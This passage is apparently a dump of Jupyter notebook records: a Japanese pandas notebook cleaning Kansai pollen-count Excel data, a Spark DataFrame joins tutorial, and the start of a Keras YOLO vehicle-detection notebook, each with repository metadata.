dtype='object')\n../../../data/2014_kansai/ë╘ò▓âfü[â^2014(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2015_kansai/ë╘ò▓âfü[â^2015(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県森林センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪府環境農林水産総合研究所', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2016_kansai/ë╘ò▓âfü[â^2016(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県林業普及センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪府環境農林水産総合研究所', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2017_kansai/ë╘ò▓âfü[â^2017(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県林業普及センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪合同庁舎第2号館別館', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2018_kansai/ë╘ò▓âfü[â^2018(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根地方気象台', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '京都府立医科大学', '舞鶴市西コミュニティセンター', '京都市右京区役所京北合同庁舎', '大阪合同庁舎第2号館別館',\n '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園', '兵庫県篠山庁舎',\n '兵庫県環境研究センター', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎', '和歌山地方気象台',\n '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n"
]
],
[
[
"---\n2015年にxlsxに変わった途端に・・・<br>\n\nこれでは元データのエクセルか、ウェブページの注釈的なものを探さないと追跡ができない \n\nもういちどエクセルを見てみると、 \n古いデータには、 \"地点\" という別のシートがあった!",
"_____no_output_____"
],
[
"sheet_nameには文字列以外にもindexが使えるとdocumentに書いてあった。 \n誰かのブログをコピってるだけだったら気づけなかったかもしれない。(自戒)",
"_____no_output_____"
]
],
[
[
"names = pd.read_excel(\"../../../data/2008_kansai/ë╘ò▓âfü[â^2008(è╓É╝).xls\", sheet_name=1)\nnames",
"_____no_output_____"
]
],
[
[
"## 列名をrenameするmapperを作る\n\nここからは適当にメソッドを探して対処していくしかない。。 \npandas力が試される・・・\n\nmappingするなら辞書が良いから辞書っぽいのを探す",
"_____no_output_____"
]
],
[
[
"names[\"地点名\"].to_dict()",
"_____no_output_____"
]
],
[
[
"<br>\nkey:value が index:列の値 となるdictができたので、index を \"地点名\" 列にして、\"施設名\" との .to_dictすれば良さそう",
"_____no_output_____"
]
],
[
[
"rename_mapper = names.set_index(\"地点名\")[\"施設名\"].to_dict()\nrename_mapper",
"_____no_output_____"
]
],
[
[
"これ。きた。",
"_____no_output_____"
]
],
[
[
"df.rename(columns=rename_mapper).head(1)\n# OK",
"_____no_output_____"
]
],
[
[
"関数に埋め込む",
"_____no_output_____"
]
],
[
[
"def load_kafun_excel_renamed_columns(path):\n df = pd.read_excel(path, skiprows=1).iloc[:,:-2]\n try:\n name = pd.read_excel(path, sheet_name=1)\n rename_mapper = names.set_index(\"地点名\")[\"施設名\"].to_dict()\n df = df.rename(columns=rename_mapper)\n \n except Exception as e:\n print(path, e)\n \n str_concat_h0_23 = df[\"年\"].astype(str)+\"/\"+df[\"月\"].astype(str)+\"/\"+df[\"日\"].astype(str)+\"/\"+(df[\"時\"]-1).astype(str) # 時から1引いてる\n df[\"date_hour\"] = pd.to_datetime(str_concat_h0_23, format=\"%Y/%m/%d/%H\")\n df.set_index(\"date_hour\", inplace=True)\n df = df.drop(columns=[\"年\",\"月\",\"日\",\"時\",]) # こっちでも全然良い\n return df",
"_____no_output_____"
],
[
"kafun_df_list = []\nfor p in sorted(kansai_kafun_files):\n df = load_kafun_excel_renamed_columns(p)\n kafun_df_list.append(df)\nkafun_renamed = pd.concat(kafun_df_list, axis=0, sort=False)\nkafun_renamed.shape",
"../../../data/2015_kansai/ë╘ò▓âfü[â^2015(è╓É╝).xlsx list index out of range\n../../../data/2016_kansai/ë╘ò▓âfü[â^2016(è╓É╝).xlsx list index out of range\n../../../data/2017_kansai/ë╘ò▓âfü[â^2017(è╓É╝).xlsx list index out of range\n../../../data/2018_kansai/ë╘ò▓âfü[â^2018(è╓É╝).xlsx list index out of range\n"
]
],
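[
    [
        "An aside, sketch only (not run as part of the processing above): one way to confirm *why* just the xlsx files raise `list index out of range` is to list the sheets of one old and one new workbook. The newer xlsx files appear to hold a single sheet, so `sheet_name=1` has nothing to point at, and their columns already carry the full facility names, so they need no renaming anyway.",
        "_____no_output_____"
    ]
],
[
    [
        "# Illustrative check only, not part of the loading pipeline above:\n# compare the sheet lists of an old .xls and a new .xlsx workbook.\nfor p in [\"../../../data/2008_kansai/ë╘ò▓âfü[â^2008(è╓É╝).xls\",\n          \"../../../data/2015_kansai/ë╘ò▓âfü[â^2015(è╓É╝).xlsx\"]:\n    print(p, pd.ExcelFile(p).sheet_names)",
        "_____no_output_____"
    ]
],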
[
[
"xlsxだけエラーになってくれてるのでxlsでは読み込めているようだ\n\n果たして結果は?",
"_____no_output_____"
]
],
[
[
"kafun_renamed.columns",
"_____no_output_____"
]
],
[
[
"---\n似た名前を探すためにソートしてみる",
"_____no_output_____"
]
],
[
[
"kafun_renamed.columns.sort_values()",
"_____no_output_____"
]
],
[
[
"---\n\n**'北山緑化植物園','北山緑化植物園(西宮市都市整備公社)'**\n\n**'西播磨', '西播磨県民局西播磨総合庁舎'** とか同一では? \n列名のゆらぎが・・・(予想はしていたがこれを全部追うのは大変なので今回はパス!)",
"_____no_output_____"
],
[
"ここでHPをもう一度見てみると。 \nhttp://kafun.taiki.go.jp/library.html#4\n\n>彦根地方気象台\t彦根市城町2丁目5-25\t彦根\t平成29年度に彦根市役所から移設 \n>舞鶴市西コミュニティセンター\t舞鶴市字南田辺1番地\t舞鶴\t平成29年度に京都府中丹東保健所より移設\n",
"_____no_output_____"
],
[
"## 追っかけるのも大変、かつ、そこまでを求めていないため、今回は少ないデータも全部残して次へ進む",
"_____no_output_____"
],
[
"---\n\n## (今回はしないが)もし少ないものを弾きたいなら\n\n全部の対応を探すのは流石に厳しそうなので、各列での NaNの値を数えてみて、NaNの値が少ないものは2008〜2018まで列名がつながっていると判断する",
"_____no_output_____"
],
[
"**count()** がそれに当たる \n**sort_values** でソートしている",
"_____no_output_____"
]
],
[
[
"kafun_renamed.count().sort_values(ascending=True).head(10)",
"_____no_output_____"
],
[
"kafun_renamed.count().sort_values(ascending=False).head(10) # Falseにしなくても、上のコードをtailにするだけでも良い",
"_____no_output_____"
]
],
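[
    [
        "For reference, a minimal sketch of how the \"drop the sparse columns\" idea above could be written if it were wanted: keep only the columns whose non-NaN count clears some threshold. The threshold value below is an arbitrary illustration, not a choice made in this notebook.",
        "_____no_output_____"
    ]
],
[
    [
        "# Sketch only - not applied in this notebook.\n# Keep columns with at least `min_rows` non-NaN hourly values;\n# the threshold is an arbitrary example, not a tuned choice.\nmin_rows = 80000\nkafun_filtered = kafun_renamed.loc[:, kafun_renamed.count() >= min_rows]\nkafun_filtered.shape",
        "_____no_output_____"
    ]
],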
[
[
"---\n\n# 一旦ここまでのデータをpickleに保存\n\nここまでの処理で生成したDataFrameをpickleで保存しておく。 \npickle にしておくと読み込みも一瞬。 \n最初からcsvなどを読んで成形して・・・を行うコードを書かなくても良いので、一時的なセーブデータとしては重宝する!(日付のパースなどの処理をやり直さなくて良いので高速)",
"_____no_output_____"
]
],
[
[
"kafun_renamed",
"_____no_output_____"
],
[
"kafun_renamed.to_pickle(\"kafun03.pkl\")",
"_____no_output_____"
]
],
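[
    [
        "As a usage note, `pd.read_pickle` restores the saved DataFrame in a later session with the datetime index and column names intact. The variable name below is arbitrary.",
        "_____no_output_____"
    ]
],
[
    [
        "# Usage note: reload the intermediate save in a fresh session.\n# (Round-trip illustration only; the variable name is arbitrary.)\nkafun_restored = pd.read_pickle(\"kafun03.pkl\")\nkafun_restored.head(1)",
        "_____no_output_____"
    ]
],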
[
[
"# 現状のデータをplotしてみる",
"_____no_output_____"
]
],
[
[
"kafun_renamed.京都府立医科大学.plot()",
"_____no_output_____"
],
[
"kafun_renamed.plot(legend=False)",
"_____no_output_____"
],
[
"kafun_renamed.tail()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb2ad4a566e8dc85aa509ae72807f8b4651c30bf | 8,071 | ipynb | Jupyter Notebook | books/spark/Chapter 8.ipynb | reddy-s/codebooks | 76f485b3d715db1676583e18bbae24f3a23d2eee | [
"Apache-2.0"
] | null | null | null | books/spark/Chapter 8.ipynb | reddy-s/codebooks | 76f485b3d715db1676583e18bbae24f3a23d2eee | [
"Apache-2.0"
] | null | null | null | books/spark/Chapter 8.ipynb | reddy-s/codebooks | 76f485b3d715db1676583e18bbae24f3a23d2eee | [
"Apache-2.0"
] | 1 | 2019-12-01T09:54:01.000Z | 2019-12-01T09:54:01.000Z | 33.911765 | 112 | 0.364887 | [
[
[
"# Chapter 8\n\n## Joins",
"_____no_output_____"
]
],
[
[
"person = spark.createDataFrame([\n (0, \"Bill Chambers\", 0, [100]),\n (1, \"Matei Zaharia\", 1, [500, 250, 100]),\n (2, \"Michael Armbrust\", 1, [250, 100])])\\\n .toDF(\"id\", \"name\", \"graduate_program\", \"spark_status\")\ngraduateProgram = spark.createDataFrame([\n (0, \"Masters\", \"School of Information\", \"UC Berkeley\"),\n (2, \"Masters\", \"EECS\", \"UC Berkeley\"),\n (1, \"Ph.D.\", \"EECS\", \"UC Berkeley\")])\\\n .toDF(\"id\", \"degree\", \"department\", \"school\")\nsparkStatus = spark.createDataFrame([\n (500, \"Vice President\"),\n (250, \"PMC Member\"),\n (100, \"Contributor\")])\\\n .toDF(\"id\", \"status\")",
"_____no_output_____"
],
[
"# Inner Join\njoinExpression = person[\"graduate_program\"] == graduateProgram['id']\nperson.join(graduateProgram, joinExpression).show()",
"+---+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| id| name|graduate_program| spark_status| id| degree| department| school|\n+---+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| 0| Bill Chambers| 0| [100]| 0|Masters|School of Informa...|UC Berkeley|\n| 1| Matei Zaharia| 1|[500, 250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n| 2|Michael Armbrust| 1| [250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n+---+----------------+----------------+---------------+---+-------+--------------------+-----------+\n\n"
],
[
"# Outer Join\njoinType = \"outer\"\nperson.join(graduateProgram, joinExpression, joinType).show()",
"+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| id| name|graduate_program| spark_status| id| degree| department| school|\n+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| 0| Bill Chambers| 0| [100]| 0|Masters|School of Informa...|UC Berkeley|\n| 1| Matei Zaharia| 1|[500, 250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n| 2|Michael Armbrust| 1| [250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n|null| null| null| null| 2|Masters| EECS|UC Berkeley|\n+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n\n"
],
[
"# Left Outer\njoinType = \"left_outer\"\ngraduateProgram.join(person, joinExpression, joinType).show()",
"+---+-------+--------------------+-----------+----+----------------+----------------+---------------+\n| id| degree| department| school| id| name|graduate_program| spark_status|\n+---+-------+--------------------+-----------+----+----------------+----------------+---------------+\n| 0|Masters|School of Informa...|UC Berkeley| 0| Bill Chambers| 0| [100]|\n| 1| Ph.D.| EECS|UC Berkeley| 1| Matei Zaharia| 1|[500, 250, 100]|\n| 1| Ph.D.| EECS|UC Berkeley| 2|Michael Armbrust| 1| [250, 100]|\n| 2|Masters| EECS|UC Berkeley|null| null| null| null|\n+---+-------+--------------------+-----------+----+----------------+----------------+---------------+\n\n"
],
[
"# Right outer\njoinType = \"right_outer\"\nperson.join(graduateProgram, joinExpression, joinType).show()",
"+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| id| name|graduate_program| spark_status| id| degree| department| school|\n+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| 0| Bill Chambers| 0| [100]| 0|Masters|School of Informa...|UC Berkeley|\n| 1| Matei Zaharia| 1|[500, 250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n| 2|Michael Armbrust| 1| [250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n|null| null| null| null| 2|Masters| EECS|UC Berkeley|\n+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n\n"
],
[
"# Left semi\njoinType = \"left_semi\"\ngraduateProgram.join(person, joinExpression, joinType).show()",
"+---+-------+--------------------+-----------+\n| id| degree| department| school|\n+---+-------+--------------------+-----------+\n| 0|Masters|School of Informa...|UC Berkeley|\n| 1| Ph.D.| EECS|UC Berkeley|\n+---+-------+--------------------+-----------+\n\n"
],
[
"# Left ani\njoinType = \"left_anti\"\ngraduateProgram.join(person, joinExpression, joinType).show()",
"+---+-------+----------+-----------+\n| id| degree|department| school|\n+---+-------+----------+-----------+\n| 2|Masters| EECS|UC Berkeley|\n+---+-------+----------+-----------+\n\n"
]
],
[
[
"> Note: Its also possible to run the following joins in Spark\n * Natural\n * Cartesion/Cross",
"_____no_output_____"
]
],
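[
    [
        "A minimal sketch of the cross (Cartesian) join mentioned above: `crossJoin` pairs every row of one DataFrame with every row of the other, so row counts grow multiplicatively and it should be used with care on large tables.",
        "_____no_output_____"
    ]
],
[
    [
        "# Cross (Cartesian) join sketch: every person paired with every graduate program.\n# With the 3-row DataFrames defined above this yields 3 x 3 = 9 rows.\nperson.crossJoin(graduateProgram).count()",
        "_____no_output_____"
    ]
],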
[
[
"spark.stop()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2adf370c5ca1250b69d36fbce30d8d5613b7eb | 65,473 | ipynb | Jupyter Notebook | Yolo Step-by-Step.ipynb | departmentfortransport/dftlab-yolo-vehiclecounting | 703b79953aa606a79e0659f99256cd613dff8a57 | [
"MIT"
] | 5 | 2018-06-11T14:07:39.000Z | 2019-10-22T17:42:01.000Z | Yolo Step-by-Step.ipynb | department-for-transport/dftlab-yolo-vehiclecounting | 703b79953aa606a79e0659f99256cd613dff8a57 | [
"MIT"
] | 1 | 2019-02-25T12:31:08.000Z | 2019-11-06T08:09:15.000Z | Yolo Step-by-Step.ipynb | department-for-transport/dftlab-yolo-vehiclecounting | 703b79953aa606a79e0659f99256cd613dff8a57 | [
"MIT"
] | null | null | null | 53.360228 | 1,317 | 0.581492 | [
[
[
"**Outline of Steps**\n + Initialization\n + Download COCO detection data from http://cocodataset.org/#download\n + http://images.cocodataset.org/zips/train2014.zip <= train images\n + http://images.cocodataset.org/zips/val2014.zip <= validation images\n + http://images.cocodataset.org/annotations/annotations_trainval2014.zip <= train and validation annotations\n + Run this script to convert annotations in COCO format to VOC format\n + https://gist.github.com/chicham/6ed3842d0d2014987186#file-coco2pascal-py\n + Download pre-trained weights from https://pjreddie.com/darknet/yolo/\n + https://pjreddie.com/media/files/yolo.weights\n + Specify the directory of train annotations (train_annot_folder) and train images (train_image_folder)\n + Specify the directory of validation annotations (valid_annot_folder) and validation images (valid_image_folder)\n + Specity the path of pre-trained weights by setting variable *wt_path*\n + Construct equivalent network in Keras\n + Network arch from https://github.com/pjreddie/darknet/blob/master/cfg/yolo-voc.cfg\n + Load the pretrained weights\n + Perform training \n + Perform detection on an image with newly trained weights\n + Perform detection on an video with newly trained weights",
"_____no_output_____"
],
[
"# Initialization",
"_____no_output_____"
]
],
[
[
"from keras.models import Sequential, Model\nfrom keras.layers import Reshape, Activation, Conv2D, Input, MaxPooling2D, BatchNormalization, Flatten, Dense, Lambda\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard\nfrom keras.optimizers import SGD, Adam, RMSprop\nfrom keras.layers.merge import concatenate\nimport matplotlib.pyplot as plt\nimport keras.backend as K\nimport tensorflow as tf\nimport imgaug as ia\nfrom tqdm import tqdm\nfrom imgaug import augmenters as iaa\nimport numpy as np\nimport pickle\nimport os, cv2\nfrom preprocessing import parse_annotation, BatchGenerator\nfrom utils import WeightReader, decode_netout, draw_boxes\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n%matplotlib inline",
"/home/zachary_arundel/freightkeras/env/lib/python3.5/site-packages/h5py/__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.\n from ._conv import register_converters as _register_converters\nUsing TensorFlow backend.\n"
],
[
"LABELS = [\"car\", \"truck\", \"pickup\", \"tractor\", \"camping car\", \"boat\",\"motorcycle\", \"van\", \"other\", \"plane\"] \n\nIMAGE_H, IMAGE_W = 416, 416\nGRID_H, GRID_W = 13 , 13\nBOX = 5\nCLASS = len(LABELS)\nCLASS_WEIGHTS = np.ones(CLASS, dtype='float32')\nOBJ_THRESHOLD = 0.3#0.5\nNMS_THRESHOLD = 0.3#0.45\nANCHORS = [0.88,1.69, 1.18,0.7, 1.65,1.77,1.77,0.9, 3.75, 3.57],\n\nNO_OBJECT_SCALE = 1.0\nOBJECT_SCALE = 5.0\nCOORD_SCALE = 1.0\nCLASS_SCALE = 1.0\n\nBATCH_SIZE = 16\nWARM_UP_BATCHES = 0\nTRUE_BOX_BUFFER = 50",
"_____no_output_____"
],
[
"wt_path = 'full_yolo_backend.h5' \ntrain_image_folder = 'train_image_folder/'\ntrain_annot_folder = 'train_annot_folder/'\nvalid_image_folder = 'valid_image_folder/'\nvalid_annot_folder = 'valid_annot_folder/'",
"_____no_output_____"
]
],
[
[
"# Construct the network",
"_____no_output_____"
]
],
[
[
"# the function to implement the orgnization layer (thanks to github.com/allanzelener/YAD2K)\ndef space_to_depth_x2(x):\n return tf.space_to_depth(x, block_size=2)",
"_____no_output_____"
],
[
"input_image = Input(shape=(IMAGE_H, IMAGE_W, 3))\ntrue_boxes = Input(shape=(1, 1, 1, TRUE_BOX_BUFFER , 4))\n\n# Layer 1\nx = Conv2D(32, (3,3), strides=(1,1), padding='same', name='conv_1', use_bias=False)(input_image)\nx = BatchNormalization(name='norm_1')(x)\nx = LeakyReLU(alpha=0.1)(x)\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 2\nx = Conv2D(64, (3,3), strides=(1,1), padding='same', name='conv_2', use_bias=False)(x)\nx = BatchNormalization(name='norm_2')(x)\nx = LeakyReLU(alpha=0.1)(x)\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 3\nx = Conv2D(128, (3,3), strides=(1,1), padding='same', name='conv_3', use_bias=False)(x)\nx = BatchNormalization(name='norm_3')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 4\nx = Conv2D(64, (1,1), strides=(1,1), padding='same', name='conv_4', use_bias=False)(x)\nx = BatchNormalization(name='norm_4')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 5\nx = Conv2D(128, (3,3), strides=(1,1), padding='same', name='conv_5', use_bias=False)(x)\nx = BatchNormalization(name='norm_5')(x)\nx = LeakyReLU(alpha=0.1)(x)\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 6\nx = Conv2D(256, (3,3), strides=(1,1), padding='same', name='conv_6', use_bias=False)(x)\nx = BatchNormalization(name='norm_6')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 7\nx = Conv2D(128, (1,1), strides=(1,1), padding='same', name='conv_7', use_bias=False)(x)\nx = BatchNormalization(name='norm_7')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 8\nx = Conv2D(256, (3,3), strides=(1,1), padding='same', name='conv_8', use_bias=False)(x)\nx = BatchNormalization(name='norm_8')(x)\nx = LeakyReLU(alpha=0.1)(x)\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 9\nx = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_9', use_bias=False)(x)\nx = BatchNormalization(name='norm_9')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 10\nx = Conv2D(256, (1,1), strides=(1,1), padding='same', name='conv_10', use_bias=False)(x)\nx = BatchNormalization(name='norm_10')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 11\nx = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_11', use_bias=False)(x)\nx = BatchNormalization(name='norm_11')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 12\nx = Conv2D(256, (1,1), strides=(1,1), padding='same', name='conv_12', use_bias=False)(x)\nx = BatchNormalization(name='norm_12')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 13\nx = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_13', use_bias=False)(x)\nx = BatchNormalization(name='norm_13')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\nskip_connection = x\n\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 14\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_14', use_bias=False)(x)\nx = BatchNormalization(name='norm_14')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 15\nx = Conv2D(512, (1,1), strides=(1,1), padding='same', name='conv_15', use_bias=False)(x)\nx = BatchNormalization(name='norm_15')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 16\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_16', use_bias=False)(x)\nx = BatchNormalization(name='norm_16')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 17\nx = Conv2D(512, (1,1), strides=(1,1), padding='same', name='conv_17', use_bias=False)(x)\nx = BatchNormalization(name='norm_17')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 18\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_18', use_bias=False)(x)\nx = BatchNormalization(name='norm_18')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 19\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', 
name='conv_19', use_bias=False)(x)\nx = BatchNormalization(name='norm_19')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 20\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_20', use_bias=False)(x)\nx = BatchNormalization(name='norm_20')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 21\nskip_connection = Conv2D(64, (1,1), strides=(1,1), padding='same', name='conv_21', use_bias=False)(skip_connection)\nskip_connection = BatchNormalization(name='norm_21')(skip_connection)\nskip_connection = LeakyReLU(alpha=0.1)(skip_connection)\nskip_connection = Lambda(space_to_depth_x2)(skip_connection)\n\nx = concatenate([skip_connection, x])\n\n# Layer 22\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_22', use_bias=False)(x)\nx = BatchNormalization(name='norm_22')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 23\nx = Conv2D(BOX * (4 + 1 + CLASS), (1,1), strides=(1,1), padding='same', name='conv_23')(x)\noutput = Reshape((GRID_H, GRID_W, BOX, 4 + 1 + CLASS))(x)\n\n# small hack to allow true_boxes to be registered when Keras build the model \n# for more information: https://github.com/fchollet/keras/issues/2790\noutput = Lambda(lambda args: args[0])([output, true_boxes])\n\nmodel = Model([input_image, true_boxes], output)",
"_____no_output_____"
],
[
"model.summary()",
"____________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n====================================================================================================\ninput_1 (InputLayer) (None, 416, 416, 3) 0 \n____________________________________________________________________________________________________\nconv_1 (Conv2D) (None, 416, 416, 32) 864 input_1[0][0] \n____________________________________________________________________________________________________\nnorm_1 (BatchNormalization) (None, 416, 416, 32) 128 conv_1[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_1 (LeakyReLU) (None, 416, 416, 32) 0 norm_1[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_1 (MaxPooling2D) (None, 208, 208, 32) 0 leaky_re_lu_1[0][0] \n____________________________________________________________________________________________________\nconv_2 (Conv2D) (None, 208, 208, 64) 18432 max_pooling2d_1[0][0] \n____________________________________________________________________________________________________\nnorm_2 (BatchNormalization) (None, 208, 208, 64) 256 conv_2[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_2 (LeakyReLU) (None, 208, 208, 64) 0 norm_2[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_2 (MaxPooling2D) (None, 104, 104, 64) 0 leaky_re_lu_2[0][0] \n____________________________________________________________________________________________________\nconv_3 (Conv2D) (None, 104, 104, 128) 73728 max_pooling2d_2[0][0] \n____________________________________________________________________________________________________\nnorm_3 (BatchNormalization) (None, 104, 104, 128) 512 conv_3[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_3 (LeakyReLU) (None, 104, 104, 128) 0 norm_3[0][0] \n____________________________________________________________________________________________________\nconv_4 (Conv2D) (None, 104, 104, 64) 8192 leaky_re_lu_3[0][0] \n____________________________________________________________________________________________________\nnorm_4 (BatchNormalization) (None, 104, 104, 64) 256 conv_4[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_4 (LeakyReLU) (None, 104, 104, 64) 0 norm_4[0][0] \n____________________________________________________________________________________________________\nconv_5 (Conv2D) (None, 104, 104, 128) 73728 leaky_re_lu_4[0][0] \n____________________________________________________________________________________________________\nnorm_5 (BatchNormalization) (None, 104, 104, 128) 512 conv_5[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_5 (LeakyReLU) (None, 104, 104, 128) 0 norm_5[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_3 (MaxPooling2D) (None, 52, 52, 128) 0 leaky_re_lu_5[0][0] \n____________________________________________________________________________________________________\nconv_6 (Conv2D) (None, 52, 52, 256) 294912 max_pooling2d_3[0][0] 
